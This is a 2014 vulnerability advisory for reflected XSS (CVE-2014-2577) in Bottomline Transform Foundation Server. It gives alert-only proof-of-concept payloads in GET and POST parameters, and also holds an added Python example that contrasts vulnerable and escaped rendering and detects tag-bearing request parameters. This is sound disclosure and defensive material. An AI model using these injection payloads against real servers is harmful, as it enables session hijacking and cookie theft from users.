SECURITYVULNS:DOC:30844 (Jun 14, 2014)

[CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies

Source: vulners.com

I. VULNERABILITY

Reflected XSS vulnerabilities in Transform Foundation Server
4.3.1 and 5.2 from Bottomline Technologies

II. BACKGROUND

Bottomline offers powerful, next-generation electronic document solutions for formatting, personalizing and delivering ERP and business application output.

III. DESCRIPTION

Several reflected XSS vulnerabilities have been detected in Transform
Foundation Server 4.3.1 and 5.2.

  1. XSS on GET parameters:

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi

  2. XSS on POST parameters:

URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:

db="XSS CODE"
referer="XSS CODE"

IV. PROOF OF CONCEPT

GET:

The application does not validate the parameter "pn" correctly.

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi

POST:

The application does not validate the parameters "db" and "referer" correctly.

XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')
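As an added defender-side illustration (not part of the advisory and not Bottomline's code), the Python below models the flaw described in sections III and IV, a request parameter copied into the HTML response without validation or encoding, beside a hardened rendering that HTML-encodes on output and an allowlist check for the document name, and adds a small log-review helper that flags requests whose percent-decoded path, query or POST parameters contain HTML tags. The handler names, the allowlist, the tag pattern and the request lines are assumptions constructed for this example; the constructed payloads use alert(1) in the shape of the advisory's PoC.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed payload in the shape of the advisory's PoC: the closing tags break out
# of the surrounding <i>/<p> context before the injected <BODY ONLOAD=...> element.
CONSTRUCTED_PAYLOAD = "</i></p><BODY ONLOAD=alert(1)>"


def render_vulnerable(pn: str) -> str:
    """Models the flaw the advisory describes (hypothetical handler, not the
    product's code): the 'pn' value is copied into the response unencoded."""
    return f"<p><i>Document: {pn}</i></p>"


def render_hardened(pn: str) -> str:
    """Output encoding: same template, but the value is HTML-encoded so that
    '<', '>', '&' and quotes cannot start markup or close the enclosing tags."""
    return f"<p><i>Document: {html.escape(pn, quote=True)}</i></p>"


# Allowlist for a document name (assumption; the product's naming rules are not stated).
PN_ALLOWED = re.compile(r"[A-Za-z0-9._-]{1,128}")


def is_valid_pn(pn: str) -> bool:
    """Input validation as a second layer: accept only plain file-name characters,
    so a request like the PoC is rejected before anything is rendered."""
    return PN_ALLOWED.fullmatch(pn) is not None


# Loose "looks like an HTML tag" pattern for triage (assumption, tuned for recall).
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)


def suspicious_params(request_line: str, body: str = "") -> dict:
    """Log-review helper: return {name: decoded_value} for every GET query or POST
    body parameter (and the URL path itself, keyed '<path>') whose percent-decoded
    value contains an HTML tag. Meant for triaging access logs or as a WAF-style
    pre-check, not as a substitute for the vendor patch."""
    method, target, _ = request_line.split(" ", 2)
    parts = urlsplit(target)
    findings = {}
    sources = [parse_qs(parts.query, keep_blank_values=True)]
    if method.upper() == "POST" and body:
        sources.append(parse_qs(body, keep_blank_values=True))
    for params in sources:
        for name, values in params.items():
            for value in values:
                if TAG_RE.search(value):
                    findings[name] = value
                    break
    # The advisory's second PoC carries the payload in the path, not in a parameter.
    path = unquote_plus(parts.path)
    if TAG_RE.search(path):
        findings["<path>"] = path
    return findings


# Constructed request lines (and POST bodies) modelled on the advisory's PoCs
# plus one benign request; the host part is omitted as in an access log.
CONSTRUCTED_REQUESTS = [
    ("GET /TransformContentCenter/index.fsp/document.pdf"
     "?pn=%3C%2Fi%3E%3C%2Fp%3E%3CBODY%20ONLOAD%3Dalert(1)%3E HTTP/1.1", ""),
    ("POST /TransformContentCenter/index.fsp/index.fsp HTTP/1.1",
     "db=%3C%2Ftd%3E%3C%2Ftr%3E%3CBODY+ONLOAD%3Dalert(1)%3E&referer=report"),
    ("GET /TransformContentCenter/index.fsp/document.pdf?pn=invoice-2014-06.pdf HTTP/1.1", ""),
    ("GET /%3CBODY%20ONLOAD%3Dalert(1)%3Eserver-status.cgi HTTP/1.1", ""),
]

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(CONSTRUCTED_PAYLOAD))
    print("hardened:  ", render_hardened(CONSTRUCTED_PAYLOAD))
    for line, body in CONSTRUCTED_REQUESTS:
        print(line.split(" ")[1][:60], "->", suspicious_params(line, body) or "clean")
```

The encoded output is the fix that actually closes the hole: with `html.escape` the PoC's `</i></p>` can no longer terminate the enclosing elements, so the injected `<BODY ONLOAD=...>` is rendered as text. The allowlist and the log helper are supporting controls; the helper is deliberately noisy (any `<tag`-like sequence in a decoded value) because for triage a false positive costs far less than a missed reflection.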

V. BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted
user's browser, in the context of the victim user's session, allowing
cookie theft and session hijacking, thus enabling full access to the
box.

VI. SYSTEMS AFFECTED

Transform Foundation Server 4.3.1
Transform Foundation Server 5.2

VII. SOLUTION

Patches released by the vendor available on customer portal and
information available here:

  1. Transform Foundation Server 4.3.1 Patch 8:
    http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630
SF2364411
SF2391461

  2. Transform Foundation Server 5.2 Patch 7:

http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630
SF2364411
SF2391461

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar
(es.linkedin.com/in/jfbolivar/) @Jfran_cbit
